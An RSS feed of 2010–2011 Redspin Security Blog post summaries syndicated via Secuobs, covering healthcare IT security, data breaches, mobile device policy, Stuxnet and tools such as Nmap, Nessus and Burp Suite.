<item><title>Mac App Store Goes Live as Apps Change Form</title><description>Secuobs.com : 2011-01-06 20:39:02 - Redspin Security Blog - Today Apple launched the Mac App Store, a marketplace for small apps and widgets on Mac OSX. Until recently, the "app" marketplace has been dominated by smartphone based stores such as the iPhone App Store (which also services iPod and iPad users) and the Android Marketplace. Recently, however, Google launched the Chrome Web Store for browser extensions in</description><link>http://www.secuobs.com/revue/news/276357.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/276357.shtml</guid></item>
<item><title>Prevx: Just Another Tool in the Sec Tools Bag</title><description>Secuobs.com : 2011-01-05 01:06:32 - Redspin Security Blog - Some of my clients in the financial sector, specifically the online banking space, have asked about Prevx. Prevx? What is it? The company's flagship product Prevx 3.0, according to their website, provides "the world's smallest, fastest, and lightest endpoint security agent yet its detection, protection and removal capabilities rival even the largest antivirus solutions". Prevx specializes in</description><link>http://www.secuobs.com/revue/news/275814.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/275814.shtml</guid></item>
<item><title>Meaningful Use, Risk Analysis and Protecting Electronic Health Information</title><description>Secuobs.com : 2011-01-04 23:14:23 - Redspin Security Blog - Registration begins this week for the Medicare and Medicaid Electronic Health Records (EHR) incentive programs. With the programs contingent on "meaningful use" of certified EHR technology, the big question now is how to achieve meaningful use. According to a mid-November survey by the College of Health Information Management Executives (CHIME) released on December 9, 2010, this won't</description><link>http://www.secuobs.com/revue/news/275798.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/275798.shtml</guid></item>
<item><title>Email Hacking Husband Faces Felony</title><description>Secuobs.com : 2010-12-31 01:58:00 - Redspin Security Blog - OK so, I can't resist commenting on this breaking news and I'm looking forward to seeing where it ends up. It has a little bit of everything in it: potential invasion of privacy, allegations of hacking, accusations of adultery, maybe even overzealous prosecution, and the list goes on. You'd think this was a story</description><link>http://www.secuobs.com/revue/news/275011.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/275011.shtml</guid></item>
<item><title>2010 Food Wiki Awards</title><description>Secuobs.com : 2010-12-30 22:16:17 - Redspin Security Blog - It has been a long year, but the weeks on the road have paid gastronomic dividends. Gems uncovered, old standards revisited, experiments gone bad. Congratulations to this year's winners. Best Dish: Fresh Trout Luncheon Special, Mac's Old House, Antioch CA. Nothing beats fresh delta fish. Finalists: Falafel, Azuri Cafe, NYC; Cereal Milk, Momofuku's Milk Bar, NYC; Cinnamon Roll, Stella's Kitchen</description><link>http://www.secuobs.com/revue/news/274954.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/274954.shtml</guid></item>
<item><title>Online Banking Security Awareness: Time for us to step up</title><description>Secuobs.com : 2010-12-29 22:13:54 - Redspin Security Blog - Year end is always a great time to reflect and assess resolutions, improvements and goals, which makes me think about major improvements banks and financial organizations have made towards security in the last year. Most companies are doing everything they can to make sure the customer has a safe, secure and somewhat enjoyable hassle-free experience with</description><link>http://www.secuobs.com/revue/news/274773.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/274773.shtml</guid></item>
<item><title>Creating an Acceptable Domain-Wide Password Policy</title><description>Secuobs.com : 2010-12-29 18:51:25 - Redspin Security Blog - Have a fresh Microsoft Windows 2003 or 2008 domain just deployed and don't know where to start? Inherited a potentially questionable domain and looking for some basic things to check? Already know what you're doing and want a sanity-check? Here are the recommended Password Policy settings to configure to try and creep towards that impossible balance</description><link>http://www.secuobs.com/revue/news/274736.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/274736.shtml</guid></item>
<item><title>Key to a Successful Information Security Program</title><description>Secuobs.com : 2010-12-28 20:49:43 - Redspin Security Blog - Performing security assessments for our clients not only brings us around the globe, but also provides a global view of effective security processes. Here are the key attributes we see in our clients that are successfully managing security risk: process, process, process. Whether our view of client security operations is from an external perspective (i.e.</description><link>http://www.secuobs.com/revue/news/274554.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/274554.shtml</guid></item>
<item><title>Lessons from the McDonald's, Walgreens and other recent data breaches</title><description>Secuobs.com : 2010-12-27 19:01:53 - Redspin Security Blog - Designing an effective Information Security Program is a process that requires a thorough knowledge of your assets (what you're protecting) and the threat sources (the type of entity that might try to get it). Understanding these two factors is foundational to building an Infosec program. Based on the results</description><link>http://www.secuobs.com/revue/news/274368.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/274368.shtml</guid></item>
<item><title>"It's time to get connected," says David Blumenthal. But make sure your IT security is healthy.</title><description>Secuobs.com : 2010-12-23 22:10:17 - Redspin Security Blog - HHS delivered an early Christmas present today with its announcement that registration for the Medicare and Medicaid electronic health record (EHR) system incentive programs opens on January 3rd. Blumenthal, head of the HHS Office of the National Coordinator for Health Information Technology, is urging inter-connectivity for the benefit of patients, providers, payers, employees, the national</description><link>http://www.secuobs.com/revue/news/273948.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/273948.shtml</guid></item>
<item><title>Garnet Hill Data Breach</title><description>Secuobs.com : 2010-12-22 20:38:56 - Redspin Security Blog - Garnet Hill data breach. Is this related to the McDonalds email provider breach? What "preferences" were stored about me?</description><link>http://www.secuobs.com/revue/news/273656.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/273656.shtml</guid></item>
<item><title>Information Security: Need-to-Share too much?</title><description>Secuobs.com : 2010-12-21 02:49:23 - Redspin Security Blog - In the post-9/11 world, disparate government agencies took flack for their need-to-know data sharing policies. To improve intelligence efforts, a need-to-share policy was employed, ideally resulting in more efficient communication and flow of inter-agency information. A need-to-share policy, however, also increases the risk of unauthorized access due to an increased threat-source population. Is opening up</description><link>http://www.secuobs.com/revue/news/273236.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/273236.shtml</guid></item>
<item><title>Information Security: Is Need-To-Share Too Much?</title><description>Secuobs.com : 2010-12-20 23:18:28 - Redspin Security Blog - In the post-9/11 world, disparate government agencies took flack for their need-to-know data sharing policies. To improve intelligence efforts, a need-to-share policy was employed, ideally resulting in more efficient communication and flow of inter-agency information. A need-to-share policy, however, also increases the risk of unauthorized access due to an increased threat-source population. Is opening up</description><link>http://www.secuobs.com/revue/news/273214.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/273214.shtml</guid></item>
<item><title>iPad's killer app</title><description>Secuobs.com : 2010-12-20 21:48:32 - Redspin Security Blog - Not so long ago came a device that offered everything you could ever want: a high powered processor, big display, portability, slick navigation, and a seemingly-endless supply of applications to choose from. Yet, one stood out above the rest: solitaire, the Windows 3.1 killer app. Fast-forward to the present and the whole plane-load of iPad-toting execs</description><link>http://www.secuobs.com/revue/news/273196.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/273196.shtml</guid></item>
<item><title>Information Security Policies Without Technical Controls are Nothing</title><description>Secuobs.com : 2010-12-17 19:47:05 - Redspin Security Blog - Information Security policies without technical controls are not effective. Consider traffic laws such as speed limits. The "policy" on the 101 freeway right by our office is that cars should go no faster than 65 miles/hour and trucks should go no faster than 55 miles/hour. Many people choose to drive at speeds over 80 miles/hour</description><link>http://www.secuobs.com/revue/news/272655.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/272655.shtml</guid></item>
<item><title>IT Security: Everything is a Risk</title><description>Secuobs.com : 2010-12-16 23:39:06 - Redspin Security Blog - I'm often amazed how often the IT security industry claims "more security" lowers their risk. "More security" does not always mean more secure. Yet, the industry often doesn't realize how several supposedly harmless aspects of security can unexpectedly raise risk. Let me explain with these examples. DLP: First, let's examine Data Loss Prevention (DLP) software and</description><link>http://www.secuobs.com/revue/news/272379.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/272379.shtml</guid></item>
<item><title>Information Security: Portable Media Arbitrage</title><description>Secuobs.com : 2010-12-16 00:33:24 - Redspin Security Blog - Everyone has a smart phone. Everyone is downloading apps. Every day is "Bring your toy to work day". Portable media introduces unique risks for which existing controls are less effective. What are these risks? Are they unique to your institution? For those of you who have time, let's run those pesky mobile devices through your trusted</description><link>http://www.secuobs.com/revue/news/272098.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/272098.shtml</guid></item>
<item><title>Gawker Hacked: Database Exposed</title><description>Secuobs.com : 2010-12-15 02:23:40 - Redspin Security Blog - Hackers have gotten a hold of the database containing usernames and passwords of roughly 1.4 million users who have posted a comment to the Gawker website or any of its popular affiliates, including lifehacker.com, gizmodo.com, jalopnik.com, jezebel.com, kotaku.com, deadspin.com and others. They are not keeping this database to themselves either. They've uploaded the entire thing</description><link>http://www.secuobs.com/revue/news/271777.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/271777.shtml</guid></item>
<item><title>How your company can prevent a Mastercard.com style DDoS attack</title><description>Secuobs.com : 2010-12-09 03:37:06 - Redspin Security Blog - In the wake of MasterCard shutting down Wikileaks.org's merchant account, an anonymous group of "Hackers", who collectively call themselves "Anonymous", have taken upon themselves to exact some vigilante justice against the evil free-speech suppressing corporation. Of course Mastercard, PayPal, and PostFinance.ch, Visa.com and Amazon.com, the other targets named in "Project Payback", have been</description><link>http://www.secuobs.com/revue/news/270436.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/270436.shtml</guid></item>
<item><title>Google Launches Chrome Web Store: Sells Browser Extensions</title><description>Secuobs.com : 2010-12-08 20:58:34 - Redspin Security Blog - Google launched the Chrome Web Store this week, much to the delight of Chrome users and Google shareholders alike. Branching off of the success of the Android Market (also owned by Google), the Chrome Web Store allows developers to easily sell Chrome browser extensions. The popularity of OSX "widgets" (and the announced Mac App Store), Windows "gadgets"</description><link>http://www.secuobs.com/revue/news/270323.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/270323.shtml</guid></item>
<item><title>Native Mobile Application Development and Security Risk Management</title><description>Secuobs.com : 2010-11-24 19:15:55 - Redspin Security Blog - Developing native mobile applications as opposed to HTML5-based apps adds complexity to mobile application security management. Peter Yared from Webtrends Apps recently posted an insightful blog entry where he points out that developing native applications for each mobile platform (i.e. iPhone, Android, Windows Mobile, Blackberry, SymbianOS, WebOS) is not practical because the development and maintenance</description><link>http://www.secuobs.com/revue/news/267251.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/267251.shtml</guid></item>
<item><title>Thoughts on Stuxnet, Iran and the Future of Information Warfare</title><description>Secuobs.com : 2010-11-23 23:59:47 - Redspin Security Blog - Many claim that Stuxnet will usher in a new kind of "cyber war". Stuxnet does introduce a previously unexplored area of attacking power facilities via USB stick; however, vulnerabilities in these systems theoretically accessible to foreign hackers are not new at all. SCADA systems that control the United States power grid have been widely declared as vulnerable</description><link>http://www.secuobs.com/revue/news/267039.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/267039.shtml</guid></item>
<item><title>Presenting nbesort.rb: An Easy Way to Sort Nessus Results by Finding</title><description>Secuobs.com : 2010-11-18 20:08:24 - Redspin Security Blog - No self respecting security engineer will tell you that they rely on automated vulnerability scanners to do the bulk of their analysis. Juicy findings that demonstrate the severity of the threat they represent usually come from thorough manual analysis. As a security engineer, it is this manual analysis of software that I live for, and</description><link>http://www.secuobs.com/revue/news/265853.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/265853.shtml</guid></item>
<item><title>Getting Started on a Mobile Device Security Policy</title><description>Secuobs.com : 2010-11-17 20:55:24 - Redspin Security Blog - How do we manage security when our users are integrating smart phones and other mobile devices into the workplace? This is a question we hear more and more from our customers as their employees are buying mobile devices such as iPads, iPhones, Blackberries, and Android driven products. The rising tide of usage of these devices</description><link>http://www.secuobs.com/revue/news/265610.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/265610.shtml</guid></item>
<item><title>Cyber war and information security</title><description>Secuobs.com : 2010-11-08 04:10:12 - Redspin Security Blog - There have been quite a few headlines recently regarding various aspects of cyber war. A number of folks in the information security community have contributed to the discussion. I happen to like the comments from Ben Tomhave and Richard Bejtlich. There is an interesting crossover between the military domain and the commercial</description><link>http://www.secuobs.com/revue/news/263116.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/263116.shtml</guid></item>
<item><title>iPhones for enterprise class applications: The issue is information security</title><description>Secuobs.com : 2010-10-31 23:50:21 - Redspin Security Blog - I bought an iPhone 4 last week. It has 32 GB of memory, nearly as much as my two and a half year old Windows notebook. It does a lot of cool things and as Steve Jobs would say, it is "insanely great". Now having said that, one of the reasons I</description><link>http://www.secuobs.com/revue/news/261358.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/261358.shtml</guid></item>
<item><title>Data loss prevention: what's the problem?</title><description>Secuobs.com : 2010-10-26 18:11:22 - Redspin Security Blog - In the last few weeks I have talked with several customers about their data loss prevention initiatives. It seems that most of the programs are focused on inadvertent data loss. These are issues such as employees sending spreadsheets with PII data to their Gmail account so they can be productive at home (a</description><link>http://www.secuobs.com/revue/news/259983.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/259983.shtml</guid></item>
<item><title>Information Security: Keeping up with the government sector, changes to FISMA and the NIST guidelines</title><description>Secuobs.com : 2010-10-18 23:42:39 - Redspin Security Blog - Often the government sector is viewed as unwieldy and cumbersome when it comes to moving rapidly to take advantage of new technology. When it comes to information security this is often the case as well. Since 2002, the US Federal Information Security Management Act (FISMA) has been used to help government agencies manage</description><link>http://www.secuobs.com/revue/news/258010.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/258010.shtml</guid></item>
<item><title>Keeping up with the government sector   changes to FISMA and the NIST guidelines</title><description>Secuobs.com : 2010-10-18 04:34:42 - Redspin Security Blog - Often the government sector is viewed as unwieldy and cumbersome when it comes to moving rapidly to take advantage of new technology When it comes to information security this is often the case as well Since 2002, the US Federal Information Security Management Act  FISMA  has been used to help government agencies manage    </description><link>http://www.secuobs.com/revue/news/257741.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/257741.shtml</guid></item>
<item><title>Risk Analysis for a Healthcare Web Application</title><description>Secuobs.com : 2010-10-11 21:50:59 - Redspin Security Blog - More often than not security and IT teams might not care to admit that decisions around information security sometimes get made in an ad hoc fashion Organizations should invest in developing the processes to make systematic decisions about how to understand the threat environment and the optimum mechanisms to protect their business The    </description><link>http://www.secuobs.com/revue/news/255944.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/255944.shtml</guid></item>
<item><title>Risk analysis for a healthcare application</title><description>Secuobs.com : 2010-10-10 03:44:16 - Redspin Security Blog - More often than many security and IT teams might care to admit, decisions around information security sometimes get made in an ad hoc fashion Organizations should invest in developing the processes to make systematic decisions about how to understand the threat environment and the optimum mechanisms to protect their business The following discussion    </description><link>http://www.secuobs.com/revue/news/255612.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/255612.shtml</guid></item>
<item><title>Penetration Testing   NMAPXML to TAB</title><description>Secuobs.com : 2010-10-07 00:13:53 - Redspin Security Blog - Following up on my last NMAP post, processing port scan data in a meaningful manner is essential to network penetration testing For those who wish to skip the SQL stage and get quick results, the following one-liner will use xmlstarlet to parse a NMAP XML file  cat nmapxml  xmlstarlet sel -T -t -m  state state 'open'  -m    </description><link>http://www.secuobs.com/revue/news/254895.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/254895.shtml</guid></item>
<item><title>Dangerous Javascript Observed in the Wild</title><description>Secuobs.com : 2010-09-30 01:33:27 - Redspin Security Blog - Today, we observed some potentially dangerous Javascript client-side code out in the wild. The code, which we were able to obtain at great lengths, is reproduced below. For those brave of heart, you can test and execute it...</description><link>http://www.secuobs.com/revue/news/252949.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/252949.shtml</guid></item>
<item><title>Using SoftPerfect's Network Scanner (Soccer Ball) to Scan Your Network for Open Shares</title><description>Secuobs.com : 2010-09-28 23:32:48 - Redspin Security Blog - SoftPerfect makes a great, simple and light network scanner that can be used to scan for open shares on your network. The product page is here and the program can be downloaded here. After downloading netscan.exe, double-click it to run the program (no need to install anything). First, you'll need to change the account Network...</description><link>http://www.secuobs.com/revue/news/252575.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/252575.shtml</guid></item>
<item><title>The increasingly sophisticated threat landscape: is your information security program prepared?</title><description>Secuobs.com : 2010-09-27 03:31:59 - Redspin Security Blog - The Washington Post reported this morning on the latest development related to Stuxnet malware. The Stuxnet code was designed from the bottom up to attack Supervisory Control and Data Acquisition (SCADA) systems, or those used to manage complex industrial networks, such as systems at power plants and chemical manufacturing facilities. The malware, which...</description><link>http://www.secuobs.com/revue/news/251861.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/251861.shtml</guid></item>
<item><title>Advanced Burp Suite Automation</title><description>Secuobs.com : 2010-09-20 23:52:07 - Redspin Security Blog - By converting Burp Suite Professional's session files to XML we were able to automate the analysis of the results with XMLStarlet on the command line. Using the IBurpExtender interface, we have now automated spidering and scanning in Burp as well. BurpExtender.java takes full advantage of the IBurpExtender interface and accepts a starting URL, output name, and optional...</description><link>http://www.secuobs.com/revue/news/250002.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/250002.shtml</guid></item>
<item><title>Worse than useless and some thoughts on cyber war</title><description>Secuobs.com : 2010-09-20 03:32:25 - Redspin Security Blog - This week the Economist featured an article about an anti-censorship product called Haystack. The product was supposed to provide anti-censorship technology. The effort was motivated by events related to the Iranian opposition movement in 2009, when activists used mobile versions of Twitter and Facebook to upload videos of police brutality and spread messages...</description><link>http://www.secuobs.com/revue/news/249650.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/249650.shtml</guid></item>
<item><title>Defcon: Advanced Format String Attacks</title><description>Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - Format string attacks remain difficult in both software and hackademic exercises as the techniques have not improved since their discovery. This session demonstrates advanced format string attack techniques designed to automate the process from creation to compromise, as well as incorporate those techniques into the Metasploit framework. The audience is encouraged to bring a basic understanding of format string attacks in order to leave the presentation with the tools necessary to never write one again.</description><link>http://www.secuobs.com/revue/news/248677.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/248677.shtml</guid></item>
<item><title>Thoughts on Intel's acquisition of McAfee</title><description>Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - Yesterday Intel took most of the security industry by surprise by announcing a $7.68 billion acquisition of McAfee. The party line justification from Intel was that security will become the third major element of differentiation in Intel's processor franchise, along with energy-efficient performance and connectivity. The near term beneficiaries seem to be McAfee...</description><link>http://www.secuobs.com/revue/news/248676.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/248676.shtml</guid></item>
<item><title>How Social Media Can Compromise Your Company's Security Posture</title><description>Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - The unbridled use of social media in the workplace represents a growing area of risk to an organization's information security posture. Social media networks present two distinct attack vectors: information leakage and false trust. Hackers, red teams and experienced penetration testers have used OSINT (open source intelligence style information gathering) for years. But now that social...</description><link>http://www.secuobs.com/revue/news/248675.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/248675.shtml</guid></item>
<item><title>Patient consent policy guidelines to support meaningful use of stage 1 data exchange</title><description>Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - Last week the ONC privacy and security tiger team for the healthcare IT committee provided guidance on patient consent policy. Summary slides of their recommendations can be found here and the full documentation can be found here. These guidelines are important because the recommendations apply to electronic exchange of patient identifiable health information...</description><link>http://www.secuobs.com/revue/news/248674.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/248674.shtml</guid></item>
<item><title>Service driven innovation in healthcare</title><description>Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - This month's edition of Harvard Business Review features an article on service driven innovation at Kaiser Permanente. Kaiser is well known in the healthcare industry as a leader in applying IT to improve quality of care and producing better business results. The organization routinely outspends its peers on IT as a percent of...</description><link>http://www.secuobs.com/revue/news/248673.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/248673.shtml</guid></item>
<item><title>Why information security risk management makes sense in the healthcare industry</title><description>Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - Lately I have been thinking about risk in the context of information security and the healthcare industry. I have written an article that you can find here about using risk management to help healthcare organizations manage their information security, privacy and compliance programs more effectively and efficiently. For the most part, using risk...</description><link>http://www.secuobs.com/revue/news/248672.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/248672.shtml</guid></item>
<item><title>Perspectives on application security and risk management</title><description>Secuobs.com : 2010-09-17 05:22:04 - Redspin Security Blog - In my last blog post I discussed information security risk management and why the financial services sector aggressively adopted the practice. My recommendation was that the healthcare industry segment needs to follow suit to increase the effectiveness and efficiency of their information security programs. It is refreshing to see evidence that this is...</description><link>http://www.secuobs.com/revue/news/248671.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/248671.shtml</guid></item>
<item><title>Getting things done: building and improving an application security program</title><description>Secuobs.com : 2010-07-29 06:40:31 - Redspin Security Blog - It seems that the realization that applications provide the most dangerous attack vector and the most common area of exposure for enterprise data has begun to take hold with the healthcare and financial services organizations that I have been talking to recently. The natural question that results is what should be done. What...</description><link>http://www.secuobs.com/revue/news/244939.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/244939.shtml</guid></item>
<item><title>The final rule on meaningful use: an opportunity for healthcare process improvement and security program development</title><description>Secuobs.com : 2010-07-17 23:55:48 - Redspin Security Blog - Earlier this week the CMS and ONC released the final Standards Rule for meaningful use of electronic health records. This culminates a process in which the ONC received thousands of comments and struggled to reach a balance between specificity (presumed to make certification and implementation a simpler task) and generalization (which can enable more rapid...</description><link>http://www.secuobs.com/revue/news/241427.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/241427.shtml</guid></item>
<item><title>Hard work: The ONC privacy and security tiger team</title><description>Secuobs.com : 2010-07-08 19:51:17 - Redspin Security Blog - Last week I attended the Healthcare IT Standards Committee meeting. The all-day meeting covered a wide variety of topics ranging from the interoperability framework and NHIN governance to updates from several teams, including the security and privacy tiger team. The Office of the National Coordinator (ONC), who heads this effort, has...</description><link>http://www.secuobs.com/revue/news/238799.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/238799.shtml</guid></item>
<item><title>Electronic prescriptions of controlled substances: a key area where information security is paramount</title><description>Secuobs.com : 2010-06-27 23:35:04 - Redspin Security Blog - Earlier this month the Drug Enforcement Administration (DEA) revised their regulations surrounding the writing of prescriptions for controlled substances electronically. The rule had been published in March in the Federal Register and is now effective. Streamlining the process associated with the e-prescribing of controlled substances has many benefits, including cost reduction and improvement...</description><link>http://www.secuobs.com/revue/news/235514.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/235514.shtml</guid></item>
<item><title>Healthcare Web Applications: The Security Achilles Heel</title><description>Secuobs.com : 2010-06-25 01:39:22 - Redspin Security Blog - At Redspin we have a unique view of the security space, given that we are hired to perform security assessments of customer web applications all the time. Our clients want to know if a hacker can access their Electronically Protected Health Records. The answer, sadly, is often yes. Many times it is dreadfully easy. This...</description><link>http://www.secuobs.com/revue/news/234872.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/234872.shtml</guid></item>
<item><title>Healthcare Breach Fines: Legal defensibility and the implications for healthcare information security programs</title><description>Secuobs.com : 2010-06-21 22:01:20 - Redspin Security Blog - Last week the media was buzzing with the actions of the California Department of Public Health (CDPH). The CDPH announced fines of $675,000 against six hospitals that had reported security breaches involving medical records. The legal basis for these fines and penalties is associated with two bills that amended California law in 2008,...</description><link>http://www.secuobs.com/revue/news/233573.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/233573.shtml</guid></item>
<item><title>State HIE deployments: Some thoughts from the field</title><description>Secuobs.com : 2010-06-16 19:23:54 - Redspin Security Blog - Health and Human Services Secretary Kathleen Sebelius is one busy government employee. From announcements regarding Regional Extension Center Awards and Job Training Grants to the State Health Information Exchange Cooperative Agreement Program, it's a daunting task to keep up with the acronyms and initiatives. For the healthcare provider on the front lines, these announcements are...</description><link>http://www.secuobs.com/revue/news/232161.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/232161.shtml</guid></item>
<item><title>A bad Apple?</title><description>Secuobs.com : 2010-06-10 03:19:21 - Redspin Security Blog - This week iPad owners had their emails leaked via a security vulnerability in the way iPads registered with AT&amp;T's 3G service. Approximately 114,000 email addresses were brute forced from a script that was supposed to recognize an iPad owner's ICC-ID (a "unique" identifier, which turned out to be predictable) and supply them an...</description><link>http://www.secuobs.com/revue/news/230262.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/230262.shtml</guid></item>
<item><title>Focus first on security goals, compliance will follow</title><description>Secuobs.com : 2010-06-07 02:29:07 - Redspin Security Blog - I was depressed earlier this week from conversations with a security vendor and a system developer. They both had developed, more or less, the same point of view. The security vendor said, "Compliance is what sells." The system developer said, "Failed audits are what can get the attention of management." Compliance...</description><link>http://www.secuobs.com/revue/news/229035.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/229035.shtml</guid></item>
<item><title>Attack Surface Reduction: An often overlooked element of application security</title><description>Secuobs.com : 2010-05-31 01:27:32 - Redspin Security Blog - In industry surveys ranging from the Symantec Threat Report to Gartner analyst reports, application security is constantly cited as the most significant area of risk for enterprises and the most prevalent threat vector for cyber crime. It certainly makes sense: why bother to spend time on reconnaissance when the front door is wide open? Many organizations have begun...</description><link>http://www.secuobs.com/revue/news/227076.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/227076.shtml</guid></item>
<item><title>Defcon CTF Qualifiers</title><description>Secuobs.com : 2010-05-25 21:53:31 - Redspin Security Blog - Every year the hacking community, both black and white hat, comes together in Las Vegas for the annual Blackhat and Defcon conferences. We discuss new attacks, show interesting research, release tools, and let loose a bit. Defcon in particular centers around a number of great competitions, the most prestigious of them being the Defcon CTF. Hacker teams...</description><link>http://www.secuobs.com/revue/news/225544.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/225544.shtml</guid></item>
<item><title>How much security is enough?</title><description>Secuobs.com : 2010-05-23 03:25:17 - Redspin Security Blog - In discussions with customers over the past few weeks the question of how much security is enough for a given organization has been raised repeatedly. Contrary to the opinion of some in the industry, this really is not a mysterious issue. To understand what is enough security requires understanding an acceptable risk level...</description><link>http://www.secuobs.com/revue/news/224802.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/224802.shtml</guid></item>
<item><title>Pay attention to social networks</title><description>Secuobs.com : 2010-05-14 23:44:35 - Redspin Security Blog - Social networks have become part of the cyber crime fabric. Recently a security researcher has provided a tool that simplifies the process of building bot armies that take their marching orders from specially created Twitter accounts. TwitterNet Builder offers script kiddies a point-type-and-click interface that forces infected PCs to take commands from a...</description><link>http://www.secuobs.com/revue/news/222356.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/222356.shtml</guid></item>
<item><title>Cloud security: new worries or the same old stuff?</title><description>Secuobs.com : 2010-05-13 08:51:06 - Redspin Security Blog - Cloud service based deployments have become commonplace in industry segments ranging from financial services to healthcare. I have discussed in earlier posts how the cloud services model will come to dominate important areas such as healthcare information exchanges. The economic model is highly attractive across a broad range of business problems. Several...</description><link>http://www.secuobs.com/revue/news/221753.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/221753.shtml</guid></item>
<item><title>Economics, HIEs and Information Security</title><description>Secuobs.com : 2010-05-05 18:38:01 - Redspin Security Blog - Do economics, HIEs and information security seem like a strange set of words to find together? I've been spending a lot of time recently talking with folks at healthcare providers and healthcare IT vendors, and they have found the relationships among these words fascinating. What I have encountered is a quite different set...</description><link>http://www.secuobs.com/revue/news/219107.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/219107.shtml</guid></item>
<item><title>Finding Social Security Numbers in packet captures with grep and ngrep</title><description>Secuobs.com : 2010-04-16 19:18:43 - Redspin Security Blog - I've been spending a lot of time lately working with packet captures. I've been stringing together a long list of silly one-liners to make a very rough pcap vulnerability scanner of sorts. This is one of those one-liners. One of the main things I first hunt for in network traffic is sensitive data leaving the network...</description><link>http://www.secuobs.com/revue/news/213093.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213093.shtml</guid></item>
<item><title>Guidelines for Securing PII Data</title><description>Secuobs.com : 2010-04-15 21:01:04 - Redspin Security Blog - Customers in industry segments from financial services to healthcare have struggled to protect personally identifiable information. Now the National Institute of Standards and Technology has released guidelines to help manage the process of securing PII data. Special Publication 800-122, titled "Guide to Protecting the Confidentiality of Personally Identifiable Information", helps customers to identify,...</description><link>http://www.secuobs.com/revue/news/212620.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/212620.shtml</guid></item>
<item><title>Converting Lots of PDFs to TXTs in Ubuntu Debian</title><description>Secuobs.com : 2010-04-15 21:01:04 - Redspin Security Blog - For those of you who are struggling to find a way to convert PDF files into TXT files, here is a quick bash script There are many alternatives out there, but none were reliable for me You ll need to have acroread and ghostscript installed for this to work  bin bash mkdir ps txt FILES pdf  for f in  FILES do echo  Processing    </description><link>http://www.secuobs.com/revue/news/212619.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/212619.shtml</guid></item>
<item><title>Netsparker Community Edition    The Sparkler </title><description>Secuobs.com : 2010-04-07 22:35:43 - Redspin Security Blog - Believe me when i say that we ve used a lot of tools We love scripts, we love things that free up our time to do the real analysis on a web application assessment We have used w3af, nikto, Grendel Scan, etc, etc  We are really happy to see a new tool we have used in    </description><link>http://www.secuobs.com/revue/news/209895.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/209895.shtml</guid></item>
